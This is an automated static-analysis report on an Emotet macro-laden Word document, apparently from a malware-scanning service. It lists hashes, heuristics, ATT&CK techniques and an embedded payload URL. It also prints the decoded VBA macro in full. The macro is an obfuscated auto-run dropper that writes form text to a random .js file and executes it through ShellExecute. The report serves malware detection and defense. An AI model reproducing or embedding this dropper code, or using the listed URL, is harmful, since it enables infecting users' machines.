Emotet — Office (OOXML) malware analysis

Static analysis result for SHA-256 72476d4b6aac7b7e…

MALICIOUS

Office (OOXML)

197.6 KB Created: 2019-09-19 13:05:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-02-04
MD5: 8005bf4ed0e4294e06e2ce668d1147cb SHA-1: 4a059e08a5a34b68aaa2eacb1bcfe390497d8d84 SHA-256: 72476d4b6aac7b7edad3d25d11fd8df168f5688ca8ef34ae78a5e30424acfbfd
470 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with a Document_Open macro. This macro executes obfuscated VBA code that references ShellExecute and WScript, indicating it's designed to run external commands or scripts. The ClamAV detection and heuristic firings strongly suggest this is a variant of the Emotet banking trojan, which commonly uses macro-enabled documents to download and execute further malicious payloads.

Heuristics 12

  • ClamAV: Doc.Trojan.Emotet-7178008-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Emotet-7178008-0
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 193,503 bytes but its declared streams total only 112,958 bytes — 80,545 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ri80enT1Ge = EW4F66 & EW4F66
    Set dddddddddd22222 = CreateObject("Scripting.FileSystemObject")
    Dim mh5UU5S2XmR1, C5K9KZ, PuL2sbAq2G, Sl0Pj5N0J4, K65C3Cm2, c2c7QJ2q80, j8846, XBW9AqZ7kG, W88bM89k9M, C9h8g2rT54, GEU42, lRj23, EO9d226n5, Kn6kn As Long
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
Dim mcz186DDl, Nff4LDR, ZE962pE, s552m, N8495, s7J0en2L, myy1f5d8, r3saJYKPr, a2KNjAa4jt0, m6QdP1daw As String
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://cbdnewsdirect.com/wordpress/4ykylrs2510/ In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/package/2006/content-typesIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/package/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-propertiesIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-propertiesIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocumentIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/pictureIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/settingsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/stylesIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/2006/relationships/vbaProjectIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTableIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/imageIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettingsIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/thememl/2012/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/2006/relationships/wordVbaDataIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/schemaLibrary/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/wordIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesIn document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://purl.org/dc/terms/In document text (OOXML body / shared strings)
    • http://purl.org/dc/dcmitype/In document text (OOXML body / shared strings)
    +3 more URL(s)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15968 bytes
SHA-256: 38a60d327392ea0cffe83eaf7fe3c71719778104df0a3dad6069511289b1eaf1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()
Dim mcz186DDl, Nff4LDR, ZE962pE, s552m, N8495, s7J0en2L, myy1f5d8, r3saJYKPr, a2KNjAa4jt0, m6QdP1daw As String
mcz186DDl = " %UU]$OSmPy;6%SyR]z#yoEaR[x[ ]br:2Z ]HZN1^l<ZUIc9EYiY!qG9mDhor^I#LMs0]fD?XWCZaT:GU:zk?YL<CR]ns9 ElD^"
Nff4LDR = "z8%GZ KA AsbL<70QJA[q7CXLs0#b8@dhe7Lprl zC;?xc3Eryff9Ea::9ULe*RzY]Baq2y ?oX,cWQoT JB3w!AT7Cux;QcR3K^"
ZE962pE = "0DcNAlm,CXNFdrMNdn9;]!h;RC$pB^paWEyrAGjMnli7@2nXG8ZyU?79dnsrAlaZ1LcZ%H e^eTl8Hd S6N[#gh9DhTERdAH kd?"
gogogorun
s552m = "sm21qSiyb079?wFR7:YyTe%w8Qk*.G A7JW@WE*Qd Ho; gO*$te6e3zqGkeSq $clwdNJ Qf^!nb wet^PDX[fwfYqA1g$P[#nR"
N8495 = "N7UXy$!$n?7AhcMUx<wM8b f%T$i78<O* q1Z.cF8dJO79ooX[E?hhAPaYHi[syDyJnsMTf 7E]h8#aXm87dIiS8Y2H$JFlOWkDt"
s7J0en2L = "j6s]7JHq8G^q2w:8l^NL9TZ Yx%ZA<$YlEhfMh28$JfSZg.#?rI a, U tKTu]lEUtGeA0<d6DTppKbx9k^Rmzp@[rj8P.MO$AO8"
myy1f5d8 = "u<:l0;] ;]9ps[W820mZcc$CssDdM yZ1WowGFJRMawz7M,BIOayhu9C^GnULC9<887*!RoOj d6WDq!m79 zU[HD]BSw*hiO1< "
r3saJYKPr = "*<<!k*9msMcrT]Xi@Jo@u ;cQzHGefW^erZtKTsei3mr@6TY;8m!Pt.p8xyN@I,7C?JKT.u@A!q%Lu?Ju9Wtt12lKm68$2Q?U6G6"
a2KNjAa4jt0 = "]ft]w MuQ WT6Donw 8CUR7m!t37NWFs$Oy1hwi2hHnY X!O*n*D*#eah!,@mo^tIn9.Ab6esR$zkF9dQU<sEJq0@AQx*p[[p ih"
m6QdP1daw = ";@$iMqHa 61Jm^7plS.Wx^s*xujSSq2.L8tZl6WUnu@Y3bs[zPMxWCsAbEB@A![6#.aw;iFNqam^AA ?mYTJ^<cXRo!g<iYZPtpH"
s552m = r3saJYKPr & s7J0en2L
ZE962pE = Nff4LDR & ZE962pE
N8495 = r3saJYKPr & r3saJYKPr
N8495 = N8495 & Nff4LDR
Nff4LDR = ZE962pE & r3saJYKPr
Dim x3721g, Tltn3WC278J, fk1bcM9, w26AQYOmm, p0fzFf2817 As Long
x3721g = 56570
Tltn3WC278J = 86458
fk1bcM9 = 5734
w26AQYOmm = 207225
p0fzFf2817 = 72212
w26AQYOmm = fk1bcM9 + fk1bcM9
w26AQYOmm = Tltn3WC278J + x3721g
Tltn3WC278J = w26AQYOmm + x3721g
Tltn3WC278J = x3721g + x3721g
w26AQYOmm = p0fzFf2817 + p0fzFf2817
End Sub

Sub MakeChanges(StyName As String, PuncMark As String)
Dim z28d40xS6367, h6I958S0, f8hP8U, U12FAfaQ1jqz, p72S2257hYm, M2K501h1T, SQH0Rn, znaJ0, CLS25X9027L, f4CY0m9, s214OZU As String
z28d40xS6367 = "Q$,L!yEr[JlO .: R%2QC8aBqmeb2,c#]pBLaH?FfTLt,H EHt3 @Wa]BBAoQmQ?eFRqAP?QlG:%F [2%,]zFdKIRATBdMnT0n*3"
h6I958S0 = "BHf@ex7;WFjgaiyaw@O*JP72.H@!f32:1ng?Rz#P77We2Wn:.yw!GNpsbR:bC*B fnE2mxp0HwcC#@GKZ<%!ebyfXY8NgQ1luF1Z"
f8hP8U = "[TXq*yG;QE]aZMutUsOZrb81.LK1s;z<qR%YCyWZ^m*3P;y[g wTgbWqN9.g?.0 jGGGaeT@C?z]3mMlN BDhlxLF76oY;fI[CAz"
    Selection.HomeKey Unit:=wdStory
    U12FAfaQ1jqz = "$CuS8^1UrLnM 0dSpPK$d@q#jsr?<z <n0m@SHcesK#FRuNO[,JSdDHm N uI9cSg!XXN WU73h B@nLHk;k< s1KK6qBI:DqfL$"
p72S2257hYm = "m30dt]jC%UL#S^z@7CXHH9It<6eW%e!:8BF1^!ZwS3 MNA;h,;0Tqpn[WOrJZ6[3!%.*N91iX8 uU ]xLMl,dWn 6<wFXC7ojr%E"
M2K501h1T = "B8*Rl1AgZmn<xP3$G^S* H9]N3<ZbFMQ^qsrymiLB6R H*D8!!nXxQDbjuq:mF%BXUWEBQZ.hlbr 2.;B?<3?R%,*x@XaYy Ya<x"
SQH0Rn = "t!Ttb$S3<:2UoYx MgCz*QbP%SDux2KgD0RXp@cRB^?r*oolM:3cNZO f iJoiemIxxCt< hIWuUiw0u[]dRI<yEs:IepM2o2sxg"
    Selection.Find.ClearFormatting
    Selection.Find.Style = ActiveDocument.Styles(StyName)
    znaJ0 = " K[G e6B^ <ztA<XG06R1P ^maKfM*qKd3hJGWsxx#oH@.ngI.fC3fYe 9YgSMfO;QD%oRe*LGkl7Sd kw^SI%cCunp*?cALHzdG"
CLS25X9027L = "%B,S tN;0G?i]Xq*Er.79TSf?D[c^$MAiKU^nUtfrTzn7LcFLN:XcoBQhc] mcSYu! fc !Zz%3IQ^2K;ERXoT Qktr]2i A6Nbp"
f4CY0m9 = "cepJrh^J:S*RwA XKt]biHa,8%N1*RlufYxmwC* bS%A9,S$zonqd7PzaB:8aPBt!3s0fO79II.LpKzs0<XCGy@E$YOK3oFC*obi"
    Selection.Find.Replacement.ClearFormatting
    s214OZU = "]s3pz2 Aa#3gDybIKPCT0,dwL<lz e@f?a[rd <*gcF@A,NJ:6Xc TECQrgUo9@a*rfls1Fgjtw K3GDQp!c7BCw^S!Bt23@@NFJ"
s214OZU = z28d40xS6367 & f8hP8U
f8hP8U = s214OZU & f8hP8U
CLS25X9027L = M2K501h1T & z28d40xS6367
p72S2257hYm = SQH0Rn & M2K501h1T
    With Selection.Find
        .Text = PuncMark & "   "
        .Replacement.Text = PuncMark & " "
        .Forward = True
        .Wrap = wdFindContinue
        .Format = True
        p72S2257hYm = SQH0Rn & znaJ0
znaJ0 = z28d40xS6367 & M2K501h1T
CLS25X9027L = s214OZU & znaJ0
    End With
    Selection.Find.Execute Replace:=wdReplaceAll
    Dim P85O3f60A, f3K79k596, CKt01, z5Hi34, om7OE392y746, A60NG0, L65y73, cB14w32bPL1, df3bL82DXa, u9Q5F, SU75oY7y As Long
P85O3f60A = 126
f3K79k596 = 1611
CKt01 = 514496
z5Hi34 = 98543
om7OE392y746 = 1539785
A60NG0 = 8206
L65y73 = 2128
cB14w32bPL1 = 80929
    Selection.Find.Text = PuncMark & "  "
    df3bL82DXa = 4050476
u9Q5F = 785370
SU75oY7y = 4095944
df3bL82DXa = SU75oY7y + P85O3f60A
L65y73 = z5Hi34 + f3K79k596
    Selection.Find.Execute Replace:=wdReplaceAll
    P85O3f60A = A60NG0 + cB14w32bPL1
u9Q5F = P85O3f60A + P85O3f60A
SU75oY7y = P85O3f60A + SU75oY7y
z5Hi34 = df3bL82DXa + CKt01
P85O3f60A = cB14w32bPL1 + df3bL82DXa
om7OE392y746 = cB14w32bPL1 + u9Q5F
z5Hi34 = cB14w32bPL1 + P85O3f60A
SU75oY7y = CKt01 + df3bL82DXa
End Sub



Private Sub saveFileToDisc(dirFosSave, get_TEXT_DATA)
Dim X4JY946HW, i8r5us, j3422, U8E4U, s6D0uY01f, ri80enT1Ge, EW4F66, l3B34X80o9 As String
X4JY946HW = ";ZqGMG GO3TXygXOwr8T;#F K.!$L<dxM?zg.^x<GU1c^mn1tO:G;.KMSxJ%g7BX Y[or9@!d2W. 88ofr6JxOMTW1WbN2X6:3]f"
i8r5us = "T[:<UNyXhuo9$]Tgl!T Kw:b,6Aw:FF0jPeiM%u:O7oZ z$$ MAGg$3u#$2q[NnMlS<U%;odoh81rqo xeyfgM PiG1X%.1cXxWY"
j3422 = "e%S 3ORm#l20%HLosxz@nD]gz,GLLTDd[<w0Qi^wNA!0kByc]by3 BCMM fR.b<d;,[tgxWY^MG6 l*ONZrF1 x#*3::9E.YM0 :"
    Dim trrrrrrrr As Boolean
    U8E4U = "0X^:Eyk,jDss<W.hLMH<cXuH<woG7@.p qYCb[iY:j^zYFR^8,#g ]#jdgbKs1RtTa *G3 ?.L]@nqwmj$Wt ALOP iXJA93C.WQ"
s6D0uY01f = "QHTYQ3@9TpD%kiYZQxWnR:HOFuMb pL7xUi1qH 93JQl o cxLZtEtfeK,[87kK O6sZ07.g0?ilgqKWh8O%GTch[<[;cxXer%cJ"
ri80enT1Ge = "os8l*fFTx%e9T3RhgN$?e.Qx3ZQghn[JJQoUwQj?G[ZL;uuX7x DdGQdJN$;sxjlez:c79mF cP8isXF#0 MrYQd2H#a6 ,0]I%0"
    trrrrrrrr = True
EW4F66 = " #Ch7nmX6uh;l:3LXSsya*3 kXb[^lrcxxQH2!<Mg<9Y.62DXh0SSeRg DbbC.z8?Mr*f N$dElZ*[TT[ns!E[y6Ngrkb!7crIK$"
l3B34X80o9 = "J];8$BcmXtmFreQ3$yFQ6WKbixb:W ,@@eC@l2MZ,7LFwieLz7JkNd@m16[EbjZJi;h0 96FFz:JTchiEPoof Y:Qu]fKH!06b1O"
s6D0uY01f = i8r5us & ri80enT1Ge
X4JY946HW = EW4F66 & i8r5us
l3B34X80o9 = ri80enT1Ge & ri80enT1Ge
X4JY946HW = i8r5us & l3B34X80o9
s6D0uY01f = s6D0uY01f & X4JY946HW
ri80enT1Ge = EW4F66 & EW4F66
    Set dddddddddd22222 = CreateObject("Scripting.FileSystemObject")
    Dim mh5UU5S2XmR1, C5K9KZ, PuL2sbAq2G, Sl0Pj5N0J4, K65C3Cm2, c2c7QJ2q80, j8846, XBW9AqZ7kG, W88bM89k9M, C9h8g2rT54, GEU42, lRj23, EO9d226n5, Kn6kn As Long
mh5UU5S2XmR1 = 6913
C5K9KZ = 286867
PuL2sbAq2G = 943536
Sl0Pj5N0J4 = 877261
K65C3Cm2 = 532327
    Set sfsf2f2ff = dddddddddd22222.CreateTextFile(dirFosSave, trrrrrrrr, trrrrrrrr)
    c2c7QJ2q80 = 9671079
j8846 = 39383
XBW9AqZ7kG = 926000
W88bM89k9M = 62885
C9h8g2rT54 = 91868
GEU42 = 183472
    sfsf2f2ff.Write get_TEXT_DATA
    lRj23 = 8540
EO9d226n5 = 9166404
Kn6kn = 3708
Kn6kn = Kn6kn + K65C3Cm2
j8846 = C9h8g2rT54 + XBW9AqZ7kG
Kn6kn = c2c7QJ2q80 + j8846
PuL2sbAq2G = Kn6kn + XBW9AqZ7kG
    sfsf2f2ff.Close
mh5UU5S2XmR1 = C9h8g2rT54 + lRj23
W88bM89k9M = K65C3Cm2 + W88bM89k9M
c2c7QJ2q80 = mh5UU5S2XmR1 + GEU42
C5K9KZ = j8846 + XBW9AqZ7kG

End Sub

Sub CheckSecLen()
Dim cG069r, p46Ztm6G504, Y9937, N5Z9Y395k, O0Y7d6, u8hG849LG, q42T1nx63, Rq2St6AEhi3, yyjZPQZ6, cjNDK9X, Ajr2m2b, IO56y8670n8, df7cT9cN4E, h7SfG295, a84803X85 As String
cG069r = "3*g2QSU,P2KG[6*j:HmPgJ,hlakx7xorSU6NM8u82ecbUyFXaxl^22,uh9y].]Q<6sP2GoCJ[Yy:6MypWrR^@z!] SbI o]w QR#"
p46Ztm6G504 = "z#N@l XO3uaG8e3jzOU,3uWW6obsmBa%ojub@ieBz*NYyrg*LC @iMwqT#aEz3oLrw<.GjM?M?<Nb[nO2ce2f.Dp<spcf;h d m."
    Dim iSec As Integer
    Y9937 = "qu hZ8#;bchd2f9jt.Bu $% N gN ^:SmDET2Cm.ul?Hn3d$^M6xN*K$oqs9IQ^!2B1xL0rb@S*]fnSIQkxB:B0:;*.Z86;ja;qf"
N5Z9Y395k = "8#Mif9UdJz.tJAKqHjZH BlOUiBisyO!x60]<Y^[O@CFE7PNc6NJK8E#U<kb.j,#rl8xrd   Qrwly9dM.lYWmXt?gIu9*!adTBr"
O0Y7d6 = "U%UR,6Y[HxPu S!!IM#$!C*S:BmC]J$l a:g#Qnuznz:[n*8hS Lr2x]^M*rX 7TIfW991gmFdlZoSiyP  dmX]8<8IMlPGLb3ng"
    Dim oRng As Range
    u8hG849LG = "Mrs]hCzH?XqZ?dXTq^y$17bq8%q7fEoR K?;<JwWDWydz%;eR!!GZ[j;Y 2FG0I;kpd SR$J]Kxu;2^P!]0]HL bs8 wNx*[Yi.S"
q42T1nx63 = "tboNDF,Ysqq uA:bs.U^]9DF*! cgx^Gl8o9FJcGhnaXIukDMu[Q6 Hms3<8ITn@[Dh:ty <J[qPN<qUPTz3GpNYu!xBhZuCk8ht"
Rq2St6AEhi3 = "@boUhuYsTpR1in^8LlD$^7Er][9E0*fHYyO3*Q6L,Z K#Rf:2c;JaO!!3tw,6CWoqg[uc]SEb$G,8gezY,BN^K[k iHY# kA]]18"
    Dim iValue As Integer
yyjZPQZ6 = "?;mfb@Z#TUYI%N3a.Ry[qDG ]QB1tCyWRSGZ;gmSyKWnOKB$U03CJ;8HJfTcycSTB]D;huN^N:.2b8S%NEsC?b BUt#S[8y2AYza"
cjNDK9X = " Or PGY6T8k^X#yJ,WWJ xKKtR,Rc.jMJiOc tmdul7eCqd*ZpaN8,Ra#9OscKQC^.d]QqQTZepn,O:$uxczyG;htTFd?G!UI9XN"
Ajr2m2b = "^KhlmLkf 0 m]w6r0 s M833;r<kOzZspf wZ[16j92,<@GdX!rX]%w?APZ*a TW$z. L<C6TCrE$J1,Buf <h.$nKF]ob%7A0h2"
IO56y8670n8 = "t2Oy:6AMYoKzu;.ao13hdXXO7!K;WPSjJl*Xy*g6O8nOdMf2oLuooej udcw2ntTaS^oCsH#wzpXh%XuSm]9 wL:ZG,7@!S#JtFi"
df7cT9cN4E = "oFrD,trxK  $qT8whM.:lt iI0shD1bn0Q<]hGp3,NDjYsL87ZAt%D ;aKS;FWh3s@<$?ryYPRLENFRhf!<b@KEaR9 x:swi:?<E"
h7SfG295 = "6g#xa2gg,H<#e%F8 <229 1asT.y[sieoFjI;P6,NeykGx;rfdHhql,6BO1cQ%%P@bWEhrr3:NqEhf 6DWPqGDze*2Lp j?p6zA$"
a84803X85 = "J66w[LW1XF@;IiLePH:Xd!%Ylnl]$WPiTBfOax! nHkaXGH^9nuoJ$eT.w^b3iu6:MSi7mQqq]Sbyih1MX3hXD7u2SxSgL[e#L8m"
    With ActiveDocument
        ' go through each section (except for the last one)
        df7cT9cN4E = Rq2St6AEhi3 & p46Ztm6G504
q42T1nx63 = Y9937 & Ajr2m2b
h7SfG295 = u8hG849LG & O0Y7d6
a84803X85 = df7cT9cN4E & Y9937
        For iSec = 1 To .Sections.Count - 1
            ' create a range object at the start of the section
            Set oRng = .Sections(iSec).Range
            oRng.Collapse wdCollapseStart
            ' insert a sectionpages field
            .Fields.Add Range:=oRng, Type:=wdFieldSectionPages
            q42T1nx63 = N5Z9Y395k & O0Y7d6
a84803X85 = yyjZPQZ6 & O0Y7d6
yyjZPQZ6 = IO56y8670n8 & a84803X85
            ' divide the sectionpages field by 2
            ' if it gives a zero as the remainder, then
            ' you have an even number of pages in the section,
            ' which is what you want with an odd section page break
            If (.Sections(iSec).Range.Fields(1).Result Mod 2) <> 0 Then
                ' if you have an odd number of pages, then insert
                ' a page break before the section's section break
                Set oRng = .Sections(iSec).Range
                With oRng
                    .Collapse Direction:=wdCollapseEnd
                    .MoveEnd Unit:=wdCharacter, Count:=-1
                    .InsertBreak Type:=wdPageBreak
                End With
            End If
            ' remove the sectionpages field that was added
            .Sections(iSec).Range.Fields(1).Delete
        Next iSec
        q42T1nx63 = h7SfG295 & N5Z9Y395k
    End With
    Dim p7157, sjW74p0915, FO3To9C4, U10424wU3m, j55644, IS8K0, GHo59 As Long
p7157 = 1840192
sjW74p0915 = 220898
FO3To9C4 = 649574
U10424wU3m = 7986
j55644 = 53858
IS8K0 = 349260
GHo59 = 5311446
U10424wU3m = GHo59 + GHo59
End Sub

Private Sub gogogorun()
Dim CdtB1WuG, zU50hPU, I569sC660, AxCm5l8197n, M7I3K4rC3, O9b3Q58n5Q0, a90TQ594KB, t66pHm54d6R, lE0T1oK7, J6l6g5B, Qs192r5 As String
CdtB1WuG = "Wy @ Wq1;.;o98A6$FjdhKq?$ ?.?EaGg8#NPDG3 zlG9xIxipa:OqF ILo3BlWTX%<bXmTAc:ZmxlP,iq@j9Rr m:WJB<#nteI;"
zU50hPU = "HS[bliOniauqR#eoWChbpF#Xa6Y Dlm^EoCbEN; RSy: : OuI<j:JEyq  Jc@Y;y;IWnS?Qh!@%xNs0p%:JA?UZs2MCq7<KzbWP"
I569sC660 = ",n kA:sx]RSk ZE!,ZwXc] 6wOk0i,SY%#![ S8%9ZIUOyz?oyN!%ggSdN;6W]tbU;iCpEHjUNc<TRFr:oSomHcW!nkDx3!tNP<%"
AxCm5l8197n = "OnghdYl3^%9G$Gw730*Z3 YFgoqOznccrgpCamqR ?1,3XOkHI*?$eszAy i!QHw!1o;q9IMWG6w20W8t*Iq2JYnz$ppyb3;;bJ#"
M7I3K4rC3 = "F2;f6SQRPAfh7IKk,Fmu:*l 1 @YQSA6wdQf*h#U1I!BfR2kpn^yy% X[mY^e9WlEw@$en$nerF9n3T<$QO0DB2MRsSL 30 R$zb"

    Randomize
O9b3Q58n5Q0 = "6*J8s@[M$%HEr2S7l*m2SdSBH !#dJsPAOG[hre]x;g]$ g1u9kMy#hOp1f.#@M?8.ZcrdSQ9Bc7L8Rcf<9Fsgb9aRK!kr#1aC1@"
a90TQ594KB = "PFiz#i]#Ce W$2cQMs[o[8ZL 99Qq#[USTQ7td6mD!c3AZY<ml@D9j:gAd8e*oE#NUFiHWQ#.YBRs36F#uJ$K,78rQW$ffJ P0@d"
t66pHm54d6R = "sxj[g^%Zez;y*6;jU%w[1h;]x[<NdKtr#[iAyuqc%,*uEwUqp2^b? bpuFPkQ[?Sw6pl29 oG3M.$[ Rm?iTxCP2$i$bO.0K.fY "
    nameOfFIleSave = ActiveDocument.AttachedTemplate.Path & Chr(92) & Rnd & ".js"

lE0T1oK7 = "Hzs KWXdBhS*r*p $0Ibn;3PRF^Ol@9kazwMij?PFjj^kR rkgwH@SfxWWSqcRh<R. L@B]fnjHXhby E!FHG7ixdzy@m,R9lZ1l"
J6l6g5B = "JRF<c s%dQ8#nZwX #$3$OJ] HE*d]PguaO^DPYcOoW6L2$f%k9af3,,jW7piIa0rS$$fdE:AILRn###Cb[T%a%yBZ;tCl7K 1#7"
Qs192r5 = "TEI$T]JdS3.F%miHy$T6GJJ0L:fX%x1%<fDYZ91RnzBu0*BTYPejtr99.Pw Qil3<I]r9 ]#kLFru[OO%%0RBHZ26eXpHdGPyMjZ"
zU50hPU = t66pHm54d6R & J6l6g5B
AxCm5l8197n = J6l6g5B & AxCm5l8197n
    textForSaveFile = UserForm1.TextBox1.Text

AxCm5l8197n = zU50hPU & I569sC660
Qs192r5 = M7I3K4rC3 & t66pHm54d6R
lE0T1oK7 = CdtB1WuG & J6l6g5B
Dim Z8e21PJQO876, z0176K287, TddL14, ZRsA8r2, NmyN69d8828, y9ft8JRn51, u96R5, zQ9IZbMBO0, w2g62, dz6XYK69S, RFPpm16, lf7zl3109yh1 As Long
Z8e21PJQO876 = 594212
z0176K287 = 9251502
TddL14 = 9731
ZRsA8r2 = 8416702
NmyN69d8828 = 92558
    saveFileToDisc nameOfFIleSave, textForSaveFile
  
y9ft8JRn51 = 12181
u96R5 = 9574599
zQ9IZbMBO0 = 496158
w2g62 = 95982
dz6XYK69S = 228
  
    runFile nameOfFIleSave

RFPpm16 = 616370
lf7zl3109yh1 = 64131
Z8e21PJQO876 = Z8e21PJQO876 + dz6XYK69S
lf7zl3109yh1 = TddL14 + lf7zl3109yh1
w2g62 = u96R5 + NmyN69d8828
RFPpm16 = Z8e21PJQO876 + u96R5
TddL14 = dz6XYK69S + lf7zl3109yh1
zQ9IZbMBO0 = zQ9IZbMBO0 + dz6XYK69S
lf7zl3109yh1 = RFPpm16 + z0176K287
End Sub









 Private Sub runFile(runFile)

    Set bfbfbbfb3333 = CreateObject("Shell.Application")
    bfbfbbfb3333.ShellExecute runFile

End Sub








Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3947C856-52D0-4C3F-833F-2C0C83174B76}{5B6FDD41-43ED-4AE0-A196-942901CD4477}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "NewMacros"
Sub cfddfd()
Dim e44k1394c, Y6j3010z0N2, t17X4FN32O, nS9W8zpbT, Pw83X23xNMF, d9Kz2, j15B72zT As String
e44k1394c = "HHFX!18 HQSbThET$a?QSCMcI1QJE*XamWj1L;f.^h11tFCY2WB?C$i@ UMZ%mphGhPpncy<njm]B#Ag,!hU alFNYjz]J.zU:I6"
Y6j3010z0N2 = "L;*Nqz!bE[k06*OXphE:xCmRdANhjpD S[Np0F 7i1oyIrlW;2ufWc]6? xeSN@pBf #zSu*8eoTOqLO@3#9Lp]B]%S8MAYh$Bb%"
